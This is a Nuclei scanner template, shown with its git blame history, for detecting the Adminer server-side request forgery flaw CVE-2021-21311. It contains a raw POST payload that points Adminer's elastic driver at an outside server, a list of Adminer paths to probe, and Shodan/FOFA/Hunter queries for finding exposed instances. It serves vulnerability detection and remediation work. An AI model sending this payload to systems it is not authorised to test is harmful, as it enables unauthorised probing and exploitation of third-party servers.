nuclei-templates/cves/2021/CVE-2021-21311.yaml

id: CVE-2021-21311

info:
  name: Adminer <4.7.9 - Server-Side Request Forgery
  author: Adam Crosser,pwnhxl
  severity: high
  description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
    - https://packagist.org/packages/vrana/adminer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
  remediation: Upgrade to version 4.7.9 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2021-21311
    cwe-id: CWE-918
  metadata:
    fofa-query: app="Adminer" && body="4.7.8"
    hunter-query: app.name="Adminer"&&web.body="4.7.8"
    shodan-query: title:"Login - Adminer"
  tags: cve,cve2021,adminer,ssrf

requests:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}

    redirects: true
    max-redirects: 1
    cookie-reuse: true
    attack: batteringram
    payloads:
      path:
        - "/index.php"
        - "/adminer.php"
        - "/adminer/adminer.php"
        - "/adminer/index.php"
        - "/_adminer.php"
        - "/_adminer/index.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>400 - Bad Request</title>"

      - type: status
        status:
          - 403

# Enhanced by md on 2023/03/13
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`id: CVE-2021-21311`

			`info:`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00			`name: Adminer <4.7.9 - Server-Side Request Forgery`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`author: Adam Crosser,pwnhxl`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`severity: high`
Enhancement: cves/2021/CVE-2021-21311.yaml by md 2023-03-13 17:04:41 +00:00			`description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`reference:`
			`- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6`
			`- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://packagist.org/packages/vrana/adminer`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-21311`
Auto Generated CVE annotations [Tue Jun 28 03:37:20 UTC 2022] :robot: 2022-06-28 03:37:20 +00:00			`remediation: Upgrade to version 4.7.9 or later.`
Auto Generated CVE annotations [Thu Mar 31 19:40:33 UTC 2022] :robot: 2022-03-31 19:40:33 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.2`
Auto Generated CVE annotations [Thu Mar 31 19:40:33 UTC 2022] :robot: 2022-03-31 19:40:33 +00:00			`cve-id: CVE-2021-21311`
			`cwe-id: CWE-918`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`metadata:`
Fix cve-2021-21311 (#6821) * update zip-backup-files * fix cve-2021-21311 * Update CVE-2021-21311.yaml * Update php-backup-files * add exposed-ds_store.yaml * lint fixes * added more matchers! * removed duplicate template * misc formatting update * added fuzz tags --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-03-04 08:05:35 +00:00			`fofa-query: app="Adminer" && body="4.7.8"`
Auto Generated CVE annotations [Sat Mar 4 08:22:19 UTC 2023] :robot: 2023-03-04 08:22:19 +00:00			`hunter-query: app.name="Adminer"&&web.body="4.7.8"`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`shodan-query: title:"Login - Adminer"`
			`tags: cve,cve2021,adminer,ssrf`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00
			`requests:`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`- raw:`
lint fixes 2023-03-04 07:09:43 +00:00			`- \|`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`POST {{path}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2021-21311.yaml 2023-03-03 07:53:41 +00:00			`auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}`
lint fixes 2023-03-04 07:09:43 +00:00
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`redirects: true`
			`max-redirects: 1`
			`cookie-reuse: true`
			`attack: batteringram`
			`payloads:`
			`path:`
			`- "/index.php"`
			`- "/adminer.php"`
			`- "/adminer/adminer.php"`
			`- "/adminer/index.php"`
			`- "/_adminer.php"`
			`- "/_adminer/index.php"`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`stop-at-first-match: true`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Enhancement: cves/2021/CVE-2021-21311.yaml by md 2023-03-13 17:04:41 +00:00			`- "<title>400 - Bad Request</title>"`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00
Update CVE-2021-21311.yaml 2022-06-28 02:59:30 +00:00			`- type: status`
			`status:`
Update CVE-2021-21311.yaml 2023-03-05 08:39:21 +00:00			`- 403`
Enhancement: cves/2021/CVE-2021-21311.yaml by md 2023-03-13 17:04:41 +00:00
			`# Enhanced by md on 2023/03/13`